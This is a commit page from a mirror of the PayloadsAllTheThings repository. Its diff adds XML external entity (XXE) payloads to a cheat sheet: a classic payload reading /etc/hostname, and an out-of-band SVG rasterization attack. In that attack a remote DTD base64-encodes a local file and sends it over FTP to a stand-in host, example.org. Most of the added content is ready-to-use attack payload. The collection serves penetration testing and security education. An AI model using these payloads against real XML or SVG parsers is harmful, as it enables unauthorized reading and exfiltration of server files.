mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #128 from noraj/patch-1
XXE: add XXE via SVG rasterization
This commit is contained in:
commit
ac0239d332
@ -380,7 +380,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||
</svg>
|
||||
```
|
||||
|
||||
```
|
||||
**Classic**
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" standalone="yes"?>
|
||||
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
|
||||
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
|
||||
@ -388,6 +390,38 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||
</svg>
|
||||
```
|
||||
|
||||
**OOB via SVG rasterization**
|
||||
|
||||
*xxe.svg*
|
||||
|
||||
```xml
|
||||
<!DOCTYPE svg [
|
||||
<!ELEMENT svg ANY >
|
||||
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
|
||||
%sp;
|
||||
%param1;
|
||||
]>
|
||||
<svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red">
|
||||
<text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
|
||||
<rect x="0" y="0" rx="10" ry="10" width="200" height="200" style="fill:pink;opacity:0.7"/>
|
||||
<flowRoot font-size="15">
|
||||
<flowRegion>
|
||||
<rect x="0" y="0" width="200" height="200" style="fill:red;opacity:0.3"/>
|
||||
</flowRegion>
|
||||
<flowDiv>
|
||||
<flowPara>&exfil;</flowPara>
|
||||
</flowDiv>
|
||||
</flowRoot>
|
||||
</svg>
|
||||
```
|
||||
|
||||
*xxe.xml*
|
||||
|
||||
```xml
|
||||
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
|
||||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>">
|
||||
```
|
||||
|
||||
### XXE inside SOAP
|
||||
|
||||
```xml
|
||||
@ -495,3 +529,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
|
||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
||||
|
Loading…
Reference in New Issue
Block a user